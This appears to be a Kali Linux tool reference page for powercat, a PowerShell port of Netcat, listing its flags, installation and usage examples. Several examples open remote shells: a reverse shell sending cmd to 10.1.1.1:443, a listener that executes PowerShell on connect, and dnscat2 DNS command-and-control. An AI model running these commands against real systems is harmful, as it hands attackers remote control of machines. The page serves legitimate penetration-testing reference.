Exploitationpowershellnetcatdnsudplistenerclient

powercat

Powercat is a PowerShell version of Netcat that reads and writes data across network connections using DNS or UDP protocols. It implements Netcat features with extras like built-in relays, PowerShell execution, and a dnscat2 client.

Description

Powercat provides Netcat functionality within PowerShell v2, enabling network data transfer over TCP, UDP, or DNS. It's a simple utility for creating connections, listening for incoming connections, and executing processes remotely. The tool is particularly useful in penetration testing for establishing reverse shells or bind shells on Windows systems via PowerShell.

Use cases include client-side attacks and obtaining code execution, as highlighted in OffSec's PEN-200 training modules such as leveraging Microsoft Word macros and Windows library files. It supports verbosity for debugging and integrates with dnscat2 for DNS-based command and control.

The script originates from a GitHub repository and is packaged for Kali Linux, depending on kali-defaults.

How It Works

Powercat emulates Netcat in PowerShell, handling TCP/UDP connections for data streaming between client and listener modes. In client mode (-c), it connects to a specified IP/port or DNS server for queries. Listener mode (-l) binds to a port (-p) to accept incoming connections. It supports process execution (-e) on connection, DNS tunneling via dnscat2 client, and additional features like relays. Data is read/written bidirectionally across protocols.

Installation

bash
sudo apt install powercat

Flags

-c <ip>Client Mode. Provide the IP of the system you wish to connect to. If you are using -dns, specify the DNS Server to send queries to.
-lListen Mode. Start a listener on the port specified by -p.
-p <port>Port. The port to connect to, or the port to listen on.
-e <proc>Execute. Specify the name of the process to start.
-vEnable verbosity.
-hPrint this help message.

Examples

Listen on port 8000 and print the output to the console.
powercat -l -p 8000
Connect to 10.1.1.1 port 443, send a shell, and enable verbosity.
powercat -c 10.1.1.1 -p 443 -e cmd -v
Print this help message.
powercat -h
Connect to the dnscat2 server and send dns queries to the dns server on 10.1.1.1 port 53.
powercat -c 10.1.1.1 -p 53 -dns
Listen on port 4444 and execute PowerShell on connection.
powercat -l -p 4444 -e powershell
Connect to example.com port 443 with verbosity enabled.
powercat -c example.com -p 443 -v
Updated 2026-04-16kali.org ↗